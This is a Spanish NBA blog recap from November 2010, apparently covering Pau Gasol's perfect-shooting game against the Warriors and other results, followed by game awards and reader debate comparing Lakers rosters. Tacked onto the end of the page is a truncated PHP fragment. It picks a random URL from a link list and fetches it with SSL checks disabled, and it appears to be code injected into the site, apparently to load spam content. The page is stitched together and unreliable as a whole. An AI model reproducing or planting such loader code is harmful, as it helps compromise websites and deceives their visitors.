La Crónica (21/10/2010)

22 de November de 2010 por txusma

Charles Barkley y Matt Barnes ya pueden apretarse un poco y hacer hueco para el nuevo jugador que consigue finalizar un partido con más de 20 puntos, 5 rebotes y 5 asistencias sin fallo alguno en el tiro. Se trata de Pau Gasol que, abusando del inexistente juego interior de los Warriors, ha acabado el partido anotando sus 10 tiros de campo y los 8 tiros libres intentados. El partido ha sido un paseo para unos Lakers (89-117) que al final del primer cuarto ya vencían por 15 puntos, y a la medía parte lo hacían por 28. Un entrenamiento con público en el que los rookies han podido contar con minutos y Shannon Brown ha vuelto a exhibir su fenomenal estado de forma.

En cambio, 2 de los equipos más fuertes del campeonato no han podido pasar una noche tan plácida como los angélinos. Los Hornets sudaron la gota gorda para imponerse a los Kings en un partido trabado y muy duro (75-71). New Orleans no tuvo una gran noche de cara al aro pero lo compensaron con una gran defensa sobre Tyreke Evans y una buena intensidad. Finalmente, los puntos de David West y sobretodo Trevor Ariza les otorgaron la victoria. 11-1 y los Hornets siguen siendo el mejor equipo de la liga, junto a los Spurs.

Y Boston cayó frente Toronto en su segunda derrota consecutiva (101-102). Los verdes se olvidaron de defender en el segundo cuarto, en el que encajaron 38 puntos, y tuvieron que ir a remolque toda la segunda parte hasta lograr el empate a falta de unos 5 minutos para el final. Pero en los minutos finales, y ante la sorpresa general, fueron los Raptors los que se llevaron el gato al agua no sin polémica. Con 1 arriba, Ray Allen perdió un balón a media cancha en una posible falta a 10 segundos para el final y el balón cayó en las manos de Amir Johnson que fue objeto de falta cuando sólo quedaban 2 segundos anotando los 2 tiros libres de rigor. Mejor no le preguntéis a Doc Rivers lo que opina de los árbitros.

Y en el último partido de la noche, victoria en la prórroga de los Pistons frente los Wizards de Gilbert Arenas que con 16 asistencias consiguió su récord personal. De la mano de unos renacidos Charlie Villanueva, en el tiempo regular y de RIP Hamilton en la prórroga, los de Michigan se llevaron el triunfo en los minutos finales (110-115).

PREMIOS

MVP: Pau Gasol se alza con el premio sin posibilidad alguna de error. 28 puntos (10 de 10 y 8 de 8 en tiros libres), 9 rebotes, 5 asistencias y 4 tapones en 30 minutos. Otra actuación histórica de las que tanto abuncan esta temporada.

Rookie: Monta Ellis no jugó gran parte del segundo tiempo tras una mala caída y su lugar lo ocupó Jeremy Lin que fue capaz de anotar 13 puntos.

Sorpresa: Y volvió Richard Hamilton. Promedia 12.1 puntos por partido esta temporada pero anoche explotó en la prórroga anotando 12 de sus 27 puntos y decidiendo el partido a favor de los Pistons.

Decepción: 5 de 17 Dorrell Wright, 1 de 10 Reggie Williams, 2 de 10 Monta Ellis… Definitivamente, no fue el día de los Warriors.

Esfuerzo en vano: Gilbert Arenas consiguió 16 asistencias, Javale McGee 16 rebotes y juntos 39 puntos pero no pudieron imponerse a Detroit en la prórroga.

Comenta

20 comentarios a esta entrada

  1. cocinitas dice:
    #1

    Este año Pau deberia ser titular del all star sin ninguna duda, vaya primer cuarto que se marcó ayer impresionante, los Lakers dan miedito este año y aún más si el banquillo sigue aportando a este nivel.

      Citar

  2. Rafa dice:
    #2

    Una pregunta tonta:
    En la estadísticas de la NBA se contabiliza la valoración?

      Citar

  3. Cocinitas dice:
    #3

    Si hay un apartado parecido al de valoración que hay en ACB, es estadisticas de nba.com sale como pts/reb/asts y además te diré que este año lo lidera Pau Gasol.

      Citar

  4. couxela dice:
    #4

    Concretamente el apartado estadístico que refleja la aportación global de un jugador en la nba es la eficiencia…

      Citar

  5. Scriers dice:
    #5

    Ayer vi los Celtics, que perdieron de una forma extrañisima contra Toronto, una canasta rara, un robo tonto, una falta extraña… no se, no se lo tendría muy en cuenta. Toronto, pese a ganar, parece un equipo con tantas carencias como promesas. Sonny Weems y De Rozan son dos saltarines buscavidas. de mucha calidad.
    Por otro lado vi a detroit, que sufrieron ante los wizards, dos equipos que si jugaran 10 veces quedarian 5-5. dependiendo de la inspiracion de unos y otros. Me gusto una canasta de villanueva cambiandose el balon a la zurda, una halleihoop de macgrady y una asistencia de arenas. En el fondo muy divertido.

      Citar

  6. Denise dice:
    #6

    De Rozan tiene clidad pero por ahora es un aurtentico pufo tirando de lejos. Un escolta no puede tener ese tiro exterior tan paupérrimo, es normal que todos sus defensores le floten.
    Que plantillón el de Lakers, veo NBA desde la 99-2000 (no por Gasol, que aún no era “nadie internacionalmente” en esas fechas, sino porque soy relativamente joven), antes de esa fecha solo he visto partidos sueltos y puntuales, pero desde el 99 hasta ahora, la mejor plantilla que he visto es el de los actuales Lakers, estoy seguro de que me llevaré palos de algunos, pero este equipo lo veo muy superior al del threepeat de principios de década, a los Spurs de Popovich de hace un lustro, o a los Bad Boys que ganaron al Big Four de Lakers. Si los lakers llevan 3 finales y 2 campeonatos seguidos (y con una porqueria de banquillo), este año se pasean por el Oeste, y sólo lesiones de jugadores importantes, un exceso de confianza, o una actuación sobrehumana del Big 3 de Miami, les impedirá mearse en los Celtics y en los Heat.
    El trabajo de Kupchak anes fué pésimo, pero desde el regalito Gasol-KwameBrown hasta hoy es magnífico, impecable, inmejorable; quizás su unico lunar, el no poder deshacerse de dos pufos como Vujacic y Walton, pero, entiendo que esa tarea es misión imposible, y el megacontrato que el firmó a KObe (que dentro de 3 años pasará factura). Pero si en los próximos 3 años ganan 1, 2 o 3 anillos más, no importará. Las alabanzas siempre se las llevan Kobe y Phil, pero lo de Kupchak si que es hacer el trabajo bien hecho.

    PD: Iverson, 2 puntos 1/6 en tiros. A estas alturas, hasta La Liga Turca le queda grande. Allá él, que continúe degradando su imagén profesional.

      Citar

  7. Red Pèrill dice:
    #7

      Citar

  8. Red Pèrill dice:
    #8

    Pau lo lidera (y de calle, subiendo su propio porcentaje como 10 puntos respecto al año pasado)

      Citar

  9. LEmontus dice:
    #9

    Puess si buen partido el wizards Detroit de ayer. Me gusta bastante Detroit

      Citar

  10. pcerezo dice:
    #10

    No sé si será la mejor plantilla de los 10 últimos años, pero sí está claro que es mejor que la del 3peat. También hay que decir que ahora hay mejores equipos que antes. De calle no sé si se van a llevar la liga o no…pero el salto que ha dado este año Gasol es para dar mucho pero que mucho miedo a los demas.
    En este momento es muy pronto pero yo solo veo a Glen Doc Rivers poniendo en apuros a Phil Jackson. Veremos como va la cosa y como llegan los Celtics a final de temporada pero los demás están un peldaño por debajo. El proyecto de Miami da la sensación que va a tardar en madurar…

      Citar

  11. cocinitas dice:
    #11

    Yo estoy con Denise tampoco recuerdo ningún equipo mejor que el de Lakers de este año y eso que aún falta por debutar Bynum madre mia.

      Citar

  12. Viva_Dirk dice:
    #12

    Mmmmm, no estoy tan seguro, aquel Shaquille era una bestia, mucho mejor que Pau, no creo que sea mejor. Y ni de lejos hay mejores equipos ahora que en aquel entonces.

      Citar

  13. sr. Lagarto dice:
    #13

    Shaquille es un pivot nato, muy bueno, eso sí en aquella época. Pero Pau es un jugador mucho más versátil, puede jugar de 5 o de 4 y como ha demostrado sobradamente hacerlo bien en ambos casos, pasa mucho mejor que Shaquille y luego estan los “intangibles”, es decir, una estupenda visión y comprensión del juego y por lo tanto saber lo que el equipo necesita y hacer mejor a los compañeros. En fin, repito, puedes comparar a un Howard de ahora con un Shaquille de entonces pero a Pau es más difícil.

    Saludos,
    Lagarto.

      Citar

  14. sergio dice:
    #14

    Pondre el unico equipo que me parece comparable: Duncan, Parker, Malik Rose, Stephen Jackson, Ginobili, Robinson, Kerr, Bowen,… Para mi el unico que se le acerca. Aparte de eso… tambien miraria a los Celtics de este año…

    Y hablando de la efficiency de la NBA, prefiero el PER de Hollinger en ESPN. Es practicamente lo mismo nada mas que adaptado al ritmo de juego de cada equipo (no es lo mismo Portland que Warriors para hacer estadísticas). A pesar de todo ninguno tiene en cuenta aspectos defensivos fundamentales.

    Para mi, la mejor noticia de los Lakers aparte de la subida de Pau es que Kobe hasta ahora solo esta metiendo el 23% de puntos de su equipo. La marca mas baja desde la 99-00 creo.

      Citar

  15. HisRoyalAirness dice:
    #15

    Howard no es comparable con Shaq ni en mil vidas que viviese. Los playoffs de Oneall eran legendarios

      Citar

  16. sr. Lagarto dice:
    #16

    Vamos a ver:
    Precisamente comparar es eso, comparas y sacas tu conclusión que en tu caso es que el mejor Howard (ahora) es peor que el mejor Shaquille (antes). Bien, ok, PERO son comparables por puesto y por dominantes pero a lo que yo voy es que Pau NO es un jugador comparable con Shaq, ni por puesto ni por características de juego.
    No sé si me explico correctamente, pero vamos es como cuando en el colegio nos decían que no se pueden sumar peras y manzanas, joder. Hay que sumar peras con peras y manzanas con manzanas ;-).

      Citar

  17. HisRoyalAirness dice:
    #17

    Cierto te entendì mal, sorry.
    Yo creo que el tipo de jugador que es Pau sólo es comparable, salvando las distancias, por caracterÌstica al gran Tim y a KG. Un jugador que es un center altura pero con mucha más movilidad y agilidad y, sobre todo, con un tiro de media distancia y una visión de juego cojonudos.
    Es mi visión, nada más.

      Citar

  18. Txusma dice:
    #18

    En la lista por el MVP de ESPN, Gasol es el 8º y Kobe el 3º: http://espn.go.com/nba/notebook/_/page/Awards-101116/nba-awards-watch. Y el argumento para ese 3er puesto de Kobe está claro: “A pesar del buen estado de forma de Pau los Lakers son el equipo de Kobe”. Y se quedan tan panchos…

      Citar

  19. TheDeerHunter dice:
    #19

    Es a lo que me refiero con la simpleza de ciertas argumentaciones y la simplificación que busca ese punto de vista. El “todo para uno” es una absoluta incoherencia y demuestra un profundo desconocimiento de lo que es y ha sido esta liga.

      Citar

  20. TheDeerHunter dice:
    #20

    Sobre lo que comentábais del “equipazo” en L.A. con Bynum sano sí creo que podría ser una de las mejores plantillas nombre por nombre que me he tirado a la cara. Y ya se habló de ello hace años en los medios USAnos cuando llegó Pau, como la plantilla más potente que había entrenado hasta la fecha Phil…
    Ojo, no estoy hablando de equipos más potentes… opino que Shaq era mucho Shaq, pero lo que había alrededor, Viva, era innombrable (como tú mismo decías el otro día)

    Recuerdo otro bestial. Blazers en el 2000, que pusieron a los mejores Lakers contra las cuerdas: Stoudamire, Greg Anthony, Steve Smith, Bonzy Wells, Scottie Pippen, Stacey Augmon, Detlef Schrempf, Brian Grant, Jermaine O’neal, Rasheed Wallace, Arvydas Sabonis.
    Para cagarse patas parabajo… eso sí, entrenados por el incompetente de Dunleavy…
    Quitando al coach, me parece el mejor roster que he visto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>